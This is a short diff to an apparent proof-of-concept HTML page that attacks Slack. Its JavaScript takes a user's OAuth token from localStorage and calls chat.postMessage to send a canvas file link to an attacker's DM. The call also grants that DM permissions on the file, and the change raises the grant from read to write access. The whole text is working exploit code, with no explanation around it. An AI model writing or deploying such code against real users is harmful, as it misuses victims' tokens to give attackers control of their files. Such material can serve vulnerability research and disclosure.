--- a/poc-file-oauth.html
+++ b/poc-file-oauth.html
@@ -33,7 +33,7 @@ var sendMessage = () => {
     var fileid = canvasURL.split("/")[5]
     var attackerdmid = document.getElementById('attackerdmid').value;
     var token = localStorage.getItem("token");
-    fetch("https://slack.com/api/chat.postMessage", {method: "POST", headers:{"Content-Type":"application/x-www-form-urlencoded"}, body: 'channel='+attackerdmid+'&file_permissions='+'[{"grant":"read","file_id":"'+fileid+'"}]'+'&blocks='+'[{"type":"rich_text","elements":[{"type":"rich_text_section","elements":[{"type":"link","url":"'+canvasURL+'"}]}]}]'+'&token='+localStorage.getItem('token')}).then(
+    fetch("https://slack.com/api/chat.postMessage", {method: "POST", headers:{"Content-Type":"application/x-www-form-urlencoded"}, body: 'channel='+attackerdmid+'&file_permissions='+'[{"grant":"write","file_id":"'+fileid+'"}]'+'&blocks='+'[{"type":"rich_text","elements":[{"type":"rich_text_section","elements":[{"type":"link","url":"'+canvasURL+'"}]}]}]'+'&token='+localStorage.getItem('token')}).then(
         response => response.json()).then((json) => {
             console.log(json)
         })
